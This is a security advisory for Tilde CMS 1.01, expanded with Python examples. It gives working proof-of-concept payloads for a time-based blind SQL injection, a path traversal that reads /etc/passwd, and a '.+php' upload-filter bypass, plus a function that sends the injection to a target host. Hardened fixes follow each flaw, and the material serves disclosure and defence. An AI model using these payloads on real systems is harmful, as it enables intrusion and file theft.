# Exploit Title: Tilde CMS 1.01 Multiple Vulnerabilities
# Date: July 7th, 2017
# Exploit Authors: Paolo Forte, Raffaele Forte <raffaele@backbox.org>
# Vendor Homepage: http://www.tildenetwork.com/
# Version: Tilde CMS 1.0.1
# Tested on: Ubuntu 12.04, PHP 5.3.10

I. INTRODUCTION
========================================================================

Tilde CMS is a closed-source content management system created by
tildenetwork.com.

II. DESCRIPTION
========================================================================

The web application suffers from multiple vulnerabilities.

1. SQL Injection
------------------------------------------------------------------------

Because the backtick character is not escaped, the following query in the
source code is injectable through the table identifier:

[class.SystemAction.php]

$SQL_string = "SELECT * FROM `form_table_".$id_form."` WHERE ID='$idForm'";
$SQL_oldData = @mysql_query($SQL_string,$this->DB_conn);

The vulnerability can be triggered via a POST request as shown in the
following PoC (time-based blind injection through the "id" parameter):

POST /actionphp/action.input.php HTTP/1.1

ActionForm=SendForm&TotalQuery=653&TotalCompiled=2&id=1` WHERE SLEEP(5)-- aaa &idForm=1234567890

The resulting query on the server side will be:

SELECT * FROM `form_table_1` WHERE SLEEP(5)-- aaa ` WHERE ID='1234567890'

For a successful exploitation, the table "form_table_1" must exist:
otherwise MySQL rejects the statement before the injected WHERE clause
(and therefore SLEEP(5)) is evaluated.

2. Path Traversal
------------------------------------------------------------------------

The "file" parameter of download.File.php is not confined to the intended
download directory, so files outside it that are readable by the web
server can be retrieved:

GET /actionphp/download.File.php?&file=../../../../../../etc/passwd
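The following is an added example, not code from the advisory or from Tilde CMS. It transcribes the vulnerable concatenation from class.SystemAction.php to Python so the resulting statement can be inspected, builds the advisory's PoC request body (with a function that sends it and times the response; the host name is an assumption and it is never called here), and contrasts it with a hardened construction: an allow-list on the numeric form id, MySQL identifier quoting (backticks doubled) as defence in depth, and a bound parameter for the row id. The `%s` placeholder assumes a driver that supports parameters (mysqli/PDO or a Python connector), which the deprecated mysql_query() shown in the advisory does not.

```python
import http.client
import re
import time
from urllib.parse import urlencode


# Server-side construction as quoted in the advisory, transcribed to Python:
# the table identifier is concatenated with no escaping of backticks.
def build_vulnerable_query(id_form: str, id_row: str) -> str:
    return "SELECT * FROM `form_table_" + id_form + "` WHERE ID='" + id_row + "'"


# The parameters of the advisory's PoC; the sleep length is configurable.
def poc_parameters(sleep_seconds: int = 5) -> dict:
    return {
        "ActionForm": "SendForm",
        "TotalQuery": "653",
        "TotalCompiled": "2",
        # Closes the backtick-quoted identifier, injects a WHERE clause and
        # comments out the rest of the original statement ("-- " + text).
        "id": "1` WHERE SLEEP(%d)-- aaa " % sleep_seconds,
        "idForm": "1234567890",
    }


def poc_body(sleep_seconds: int = 5) -> str:
    """URL-encoded POST body for /actionphp/action.input.php."""
    return urlencode(poc_parameters(sleep_seconds))


def send_poc(host: str, port: int = 80, sleep_seconds: int = 5) -> float:
    """Send the PoC and return the round-trip time in seconds.

    A delay of roughly sleep_seconds means the injected WHERE clause ran,
    which also confirms that form_table_1 exists. Needs network access;
    the target host is supplied by the caller (assumption, not called here).
    """
    conn = http.client.HTTPConnection(host, port, timeout=sleep_seconds + 30)
    started = time.monotonic()
    conn.request("POST", "/actionphp/action.input.php", body=poc_body(sleep_seconds),
                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    conn.getresponse().read()
    conn.close()
    return time.monotonic() - started


# --- Hardened construction (added here, not the vendor's fix) -------------

_FORM_ID = re.compile(r"[0-9]{1,10}")


def quote_identifier(name: str) -> str:
    """MySQL identifier quoting: a backtick inside a quoted identifier is
    written as two backticks, so attacker input cannot close the quote."""
    return "`" + name.replace("`", "``") + "`"


def build_safe_query(id_form: str, id_row: str):
    """Allow-list the table suffix (a numeric form id) and bind the row id.

    Returns (sql, params) for a driver that supports placeholders.
    """
    if not _FORM_ID.fullmatch(id_form):
        raise ValueError("invalid form id: %r" % id_form)
    # Redundant after the allow-list check, but keeps the statement safe
    # if that check is ever loosened.
    table = quote_identifier("form_table_" + id_form)
    return "SELECT * FROM " + table + " WHERE ID=%s", (id_row,)
```

Comparing `build_vulnerable_query` with `quote_identifier` on the same payload shows the difference: with escaping, the whole payload becomes one (invalid) table name and the injected WHERE never leaves the identifier.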
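As an added example (not the CMS's code), the check that download.File.php lacks: the requested name is joined onto the download directory, both sides are canonicalised with realpath(), and the result is served only if it is still inside the directory. `vulnerable_download_path` reproduces what the advisory's PoC exploits; the directory name is an assumption.

```python
import os

# Download directory of the CMS: an assumption for this example.
DOWNLOAD_DIR = "/srv/tilde/download"


def vulnerable_download_path(base_dir: str, requested: str) -> str:
    """What the advisory's PoC relies on: the parameter is appended to the
    directory and ".." components walk out of it once the OS resolves them."""
    return os.path.normpath(os.path.join(base_dir, requested))


def resolve_download_path(base_dir: str, requested: str):
    """Return the absolute path to serve, or None if it would escape base_dir.

    realpath() canonicalises both sides, including symlinks, so a link inside
    the directory that points outside is rejected as well. Containment is
    tested on path components, not as a string prefix, so a sibling such as
    base_dir + "_private" does not pass.
    """
    base = os.path.realpath(base_dir)
    # os.path.join discards base if `requested` is absolute ("/etc/passwd");
    # the containment test below catches that case too.
    candidate = os.path.realpath(os.path.join(base, requested))
    try:
        if os.path.commonpath([base, candidate]) != base:
            return None
    except ValueError:  # mixed absolute/relative or different drives
        return None
    if candidate == base:
        return None  # the directory itself is not a file to download
    return candidate


def is_allowed_download(base_dir: str, requested: str) -> bool:
    return resolve_download_path(base_dir, requested) is not None
```

Percent-encoded variants such as `..%2f` are decoded by the web server before PHP sees the parameter, so the check must run on the decoded value, as it does here.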
3. Arbitrary File Upload
------------------------------------------------------------------------

It is possible to bypass the upload restrictions implemented in the
following snippet of code:

$file=$_FILES['file'.$i]['tmp_name'];
if (($file!="")&&($file!="none")) {
    $source_file=$file;
    $file_name=$_FILES['file'.$i]['name'];
    $file_name=str_replace(".php",".txt",$file_name);
    $file_name=str_replace(" ","_",$file_name);
    $file_name=str_replace("+","",$file_name);

The ".php" to ".txt" substitution runs before "+" characters are stripped,
so a file named "filename.+php" does not match ".php" at the first step and
is renamed to "filename.php" by the last one; the PHP file is therefore
uploaded successfully.

4. Insecure Direct Object References
------------------------------------------------------------------------

It is possible to retrieve sensitive resources by using direct references.
A low privileged user can load PHP resources such as:

admin/content.php
admin/content.php?method=ftp_upload

IV. BUSINESS IMPACT
========================================================================

These flaws may compromise the integrity of the system and/or expose
sensitive information.

V. SYSTEMS AFFECTED
========================================================================

Tilde CMS 1.01 is vulnerable (probably all previous versions).

VI. VULNERABILITY HISTORY
========================================================================

July 6th, 2017: Vulnerability identification
July 7th, 2017: Vendor notification
July 13th, 2017: Vendor notification

VII. LEGAL NOTICES
========================================================================

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this
information.
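Returning to the upload filter in section II.3, the following added example (not the CMS's code) transcribes the three str_replace() calls to Python, where str.replace() has the same left-to-right, non-overlapping semantics, so the ".+php" bypass and its variants can be checked directly. It then shows a hardened alternative that decides on an allow-list of extensions after normalisation and never reuses the client-supplied name; the allowed extension set is an assumption.

```python
import os
import re
import secrets


# The advisory's rename chain from the upload handler, transcribed from PHP.
def cms_rename(file_name: str) -> str:
    file_name = file_name.replace(".php", ".txt")
    file_name = file_name.replace(" ", "_")
    file_name = file_name.replace("+", "")
    return file_name


def cms_keeps_php(file_name: str) -> bool:
    """True if the stored name still ends in ".php" after the CMS's renaming."""
    return cms_rename(file_name).endswith(".php")


# Names that survive the filter: "+" is removed only after the ".php"
# substitution has already run, so the substitution never sees ".php".
# (The substitution is also case-sensitive; whether "shell.PHP" executes
# depends on the server's handler mapping, so it is not listed here.)
BYPASS_NAMES = ["filename.+php", "shell.p+hp", "+shell.+php"]


# --- Hardened handling (added here, not the vendor's fix) -----------------

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}  # assumption


def safe_stored_name(original_name: str):
    """Return a server-chosen file name for the upload, or None to reject it.

    The decision is an allow-list on the final extension, taken after all
    normalisation, and the base name is random, so nothing the client put in
    the name (extra dots, "+", directory parts) reaches the filesystem.
    """
    base = os.path.basename(original_name.replace("\\", "/"))
    _, ext = os.path.splitext(base)
    ext = ext.lstrip(".").lower()
    if not re.fullmatch(r"[a-z0-9]{1,5}", ext) or ext not in ALLOWED_EXTENSIONS:
        return None
    return secrets.token_hex(16) + "." + ext
```

Because the stored name carries exactly one extension, double-extension tricks such as "shell.php.jpg" are neutralised as well: the file lands as <random>.jpg regardless of the original name.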